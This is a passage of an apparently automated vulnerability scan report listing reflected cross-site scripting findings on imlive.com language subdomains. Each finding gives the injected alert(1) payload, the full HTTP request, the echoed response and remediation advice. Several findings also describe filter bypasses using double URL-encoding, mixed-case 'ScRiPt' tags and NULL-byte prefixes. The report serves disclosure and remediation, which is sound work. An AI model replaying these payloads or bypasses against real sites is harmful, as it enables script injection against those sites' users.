<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="hi-IN" lang="hi-IN" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=in.imlive.com&ul=/?76f4b'-alert(1)-'bf4b062c8a0=1&qs=76f4b'-alert(1)-'bf4b062c8a0=1&qs=76f4b'-alert(1)-'bf4b062c8a0=1&iy=dallas&id=44&iu=1&vd=ad80ea2b-9f30-4fa6-87d5-ff9831af5170';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach ...[SNIP]...
2.147. http://in.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://in.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30418"><script>alert(1)</script>eb906244d97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?30418"><script>alert(1)</script>eb906244d97=1 HTTP/1.1 Host: in.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload efac5'onerror%3d'alert(1)'f4ba4def511 was submitted in the gotopage parameter. This input was echoed as efac5'onerror='alert(1)'f4ba4def511 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=efac5'onerror%3d'alert(1)'f4ba4def511 HTTP/1.1 Host: in.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:24:50 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: iin=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQQSSTATD=NKPDBJMAFMLOCIAIEHIHPIKM; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:24:51 GMT Connection: close Content-Length: 8306 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
2.149. http://it.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://it.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e1c9"><a>8cb16e9fe00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?9e1c9"><a>8cb16e9fe00=1 HTTP/1.1 Host: it.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it-IT" lang="it-IT" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||9e1c9"><a>8cb16e9fe00~1');return false;"> ...[SNIP]...
2.150. http://it.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://it.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46421'-alert(1)-'4594a948ef4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?46421'-alert(1)-'4594a948ef4=1 HTTP/1.1 Host: it.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a32d9'onerror%3d'alert(1)'7223884f696 was submitted in the gotopage parameter. This input was echoed as a32d9'onerror='alert(1)'7223884f696 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=a32d9'onerror%3d'alert(1)'7223884f696 HTTP/1.1 Host: it.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:25:04 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: iit=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQSQSRBSD=HDONOIMAGIIFDHIHJOLHJHAN; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:25:04 GMT Connection: close Content-Length: 8305 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
2.152. http://jp.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://jp.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2e62'-alert(1)-'e87ff225301 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?d2e62'-alert(1)-'e87ff225301=1 HTTP/1.1 Host: jp.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja-JP" lang="ja-JP" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=jp.imlive.com&ul=/?d2e62'-alert(1)-'e87ff225301=1&qs=d2e62'-alert(1)-'e87ff225301=1&qs=d2e62'-alert(1)-'e87ff225301=1&iy=dallas&id=44&iu=1&vd=7a755e33-be6e-4c0d-be05-9c18484cccd6';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach ...[SNIP]...
2.153. http://jp.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://jp.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bda08"><ScRiPt>alert(1)</ScRiPt>8bd9e847e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /?bda08"><ScRiPt>alert(1)</ScRiPt>8bd9e847e0=1 HTTP/1.1 Host: jp.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja-JP" lang="ja-JP" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||bda08"><script>alert(1)</script>8bd9e847e0~1');return false;"> ...[SNIP]...
2.154. http://mx.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mx.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9bb54'-alert(1)-'7c77be0c2b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?9bb54'-alert(1)-'7c77be0c2b9=1 HTTP/1.1
Host: mx.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-MX" lang="es-MX" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=mx.imlive.com&ul=/?9bb54'-alert(1)-'7c77be0c2b9=1&qs=9bb54'-alert(1)-'7c77be0c2b9=1&qs=9bb54'-alert(1)-'7c77be0c2b9=1&iy=dallas&id=44&iu=1&vd=a7e3d806-3337-4a1b-9339-464061ff6408';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach ...[SNIP]...
2.155. http://mx.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://mx.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 601d8"><a>9322a6cdc6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?601d8"><a>9322a6cdc6e=1 HTTP/1.1
Host: mx.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-MX" lang="es-MX" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||601d8"><a>9322a6cdc6e~1');return false;"> ...[SNIP]...
2.156. http://nl.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://nl.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54070'-alert(1)-'486543e8cd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?54070'-alert(1)-'486543e8cd0=1 HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl-NL" lang="nl-NL" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=nl.imlive.com&ul=/?54070'-alert(1)-'486543e8cd0=1&qs=54070'-alert(1)-'486543e8cd0=1&qs=54070'-alert(1)-'486543e8cd0=1&iy=dallas&id=44&iu=1&vd=aac8efee-19e5-488d-a8b9-e4ac7d66bb67';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach ...[SNIP]...
2.157. http://nl.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://nl.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b38ce"><ScRiPt>alert(1)</ScRiPt>70a1d0b675c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /?b38ce"><ScRiPt>alert(1)</ScRiPt>70a1d0b675c=1 HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload abf97'onerror%3d'alert(1)'3747a08c954 was submitted in the gotopage parameter. This input was echoed as abf97'onerror='alert(1)'3747a08c954 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/abf97'onerror%3d'alert(1)'3747a08c954 HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:24 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: inl=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQRTQDQC=PKPLFJMAFPAENFFGPJDEIIPJ; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:25 GMT
Connection: close
Content-Length: 8315
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
2.159. http://no.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://no.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0019f9e"><script>alert(1)</script>4ba4bc172bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19f9e"><script>alert(1)</script>4ba4bc172bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /?%0019f9e"><script>alert(1)</script>4ba4bc172bb=1 HTTP/1.1
Host: no.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nn-NO" lang="nn-NO" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||%0019f9e"><script>alert(1)</script>4ba4bc172bb~1');return false;"> ...[SNIP]...
2.160. http://no.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://no.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0a13'-alert(1)-'2db01fc98e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?b0a13'-alert(1)-'2db01fc98e2=1 HTTP/1.1
Host: no.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload be3dc'onerror%3d'alert(1)'5045d73ef51 was submitted in the gotopage parameter. This input was echoed as be3dc'onerror='alert(1)'5045d73ef51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/be3dc'onerror%3d'alert(1)'5045d73ef51 HTTP/1.1
Host: no.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:24 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ino=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQQTQRCSD=FAOLDJMABFDNBFGJJENBGHOA; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:24 GMT
Connection: close
Content-Length: 8316
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
2.162. http://pu.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://pu.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46447"><script>alert(1)</script>ca3e148e25e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?46447"><script>alert(1)</script>ca3e148e25e=1 HTTP/1.1
Host: pu.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pa-IN" lang="pa-IN" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||46447"><script>alert(1)</script>ca3e148e25e~1');return false;"> ...[SNIP]...
2.163. http://pu.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://pu.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e39ce'-alert(1)-'10f765ebe49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?e39ce'-alert(1)-'10f765ebe49=1 HTTP/1.1
Host: pu.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pa-IN" lang="pa-IN" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=pu.imlive.com&ul=/?e39ce'-alert(1)-'10f765ebe49=1&qs=e39ce'-alert(1)-'10f765ebe49=1&qs=e39ce'-alert(1)-'10f765ebe49=1&iy=dallas&id=44&iu=1&vd=918cb142-ac05-44ff-b781-bebd10f67a21';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach ...[SNIP]...
2.164. http://ru.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ru.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9277'-alert(1)-'48bfaebef6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?e9277'-alert(1)-'48bfaebef6a=1 HTTP/1.1
Host: ru.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-RU" lang="ru-RU" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=ru.imlive.com&ul=/?e9277'-alert(1)-'48bfaebef6a=1&qs=e9277'-alert(1)-'48bfaebef6a=1&qs=e9277'-alert(1)-'48bfaebef6a=1&iy=dallas&id=44&iu=1&vd=591f9b95-a40e-412c-8b3f-904dd62e2a06';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach ...[SNIP]...
2.165. http://ru.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ru.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ba898"><script>alert(1)</script>ea1f44e02c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ba898"><script>alert(1)</script>ea1f44e02c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /?%00ba898"><script>alert(1)</script>ea1f44e02c1=1 HTTP/1.1
Host: ru.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8a0cf'onerror%3d'alert(1)'9653cda9fbc was submitted in the gotopage parameter. This input was echoed as 8a0cf'onerror='alert(1)'9653cda9fbc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/8a0cf'onerror%3d'alert(1)'9653cda9fbc HTTP/1.1
Host: ru.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: iru=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQSQQASC=MBDGAJMAPJDFGCLMLOHPEKEG; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:28 GMT
Connection: close
Content-Length: 8316
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
2.167. http://se.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://se.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6521b"><ScRiPt>alert(1)</ScRiPt>71abce1a13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /?6521b"><ScRiPt>alert(1)</ScRiPt>71abce1a13=1 HTTP/1.1
Host: se.imlive.com
Accept: */*
